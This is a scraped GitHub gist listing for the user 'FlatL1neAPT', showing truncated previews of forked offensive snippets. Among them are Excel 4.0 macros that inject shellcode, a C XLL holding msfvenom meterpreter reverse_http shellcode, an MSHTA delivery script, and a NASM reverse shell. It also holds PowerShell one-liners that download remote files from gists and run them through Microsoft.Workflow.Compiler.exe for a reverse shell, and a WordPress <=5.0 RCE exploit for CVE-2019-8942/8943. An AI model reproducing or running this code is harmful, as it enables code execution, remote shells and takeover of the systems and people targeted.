Skip to content

Instantly share code, notes, and snippets.

🏠
Working from home

FlatL1ne FlatL1neAPT

🏠
Working from home
Block or report user

Report or block FlatL1neAPT

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@FlatL1neAPT
FlatL1neAPT / shellcode.xlsm
Created May 28, 2019 — forked from Arno0x/shellcode.xlsm
XLM (Excel 4.0 macro) to execute a shellcode into Excel (32 bits) - French Macro code
View shellcode.xlsm
Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0".
================================================================================
Paste this in cells in column A, starting in cell A1:
================================================================================
=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9)
=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9)
=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9)
=VAlloc(0;4096;4096;64)
View msbuild_14_xsltransformation.csproj
<!-- "c:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe" c:\test\xslt_fun.csproj -->
<Project DefaultTargets="RunMe" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="RunMe">
<XslTransformation
UseTrustedSettings="true"
XslInputPath="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/e0d2854caf81778da8aaf5fc0cf06f798d9db4dd/xsl-notepad.xsl"
XmlContent="&lt;?xml version=&quot;1.0&quot;?&gt;&lt;?xml-stylesheet type=&quot;text/xsl&quot;?&gt;&lt;a&gt;&lt;b&gt;&lt;c&gt;d&lt;/c&gt;&lt;/b&gt;&lt;/a&gt;"
OutputPaths="delete_me.txt" />
</Target>
</Project>
@FlatL1neAPT
FlatL1neAPT / poc.png
Created May 21, 2019 — forked from caseysmithrc/poc.png
MSBuild - Property functions -
View poc.png
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
View noscript-tracking.go
// Tracking cursor position in real-time without JavaScript
// Demo: https://twitter.com/davywtf/status/1124146339259002881
package main
import (
"fmt"
"net/http"
"strings"
)
@FlatL1neAPT
FlatL1neAPT / TestMSHTAShellcodeDelivery.ps1
Created Apr 11, 2019 — forked from caseysmithrc/TestMSHTAShellcodeDelivery.ps1
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.
View TestMSHTAShellcodeDelivery.ps1
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
<#
Moving Credtis for CACTUSTORCH HERE
I was in escape sequcence hell ;-)
' ( ) ( )
View shellcode_ExcelRegisterXLL.c
// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>
__declspec(dllexport) void __cdecl xlAutoOpen(void);
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
unsigned char b[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
@FlatL1neAPT
FlatL1neAPT / VitaLoader.java
Created Mar 11, 2019 — forked from xerpi/Now has a repository
Ghidra Vita loader script
View VitaLoader.java
//@author Sergi Granell
//@category _NEW_
//@keybinding
//@menupath
//@toolbar
/*
* This script depends on the yamlbeans library.
* Download the JAR from https://github.com/EsotericSoftware/yamlbeans/releases
* and add the path to Ghidra's "Edit" -> "Plugin Path..." configuration.
View reverse-tcs-auth-shell.nasm
; =================================================
; Password protected x64 TCP Reverse Shell
; Author: Alan Vivona
; =================================================
global _start
; Syscall numbers
syscalls.socket equ 0x29
syscalls.bind equ 0x31
@FlatL1neAPT
FlatL1neAPT / PowerShell_Command.txt
Created Mar 5, 2019 — forked from BankSecurity/PowerShell_Command.txt
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
View PowerShell_Command.txt
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof
@FlatL1neAPT
FlatL1neAPT / wordpress-rce.js
Created Mar 3, 2019 — forked from allyshka/wordpress-rce.js
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
View wordpress-rce.js
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
You can’t perform that action at this time.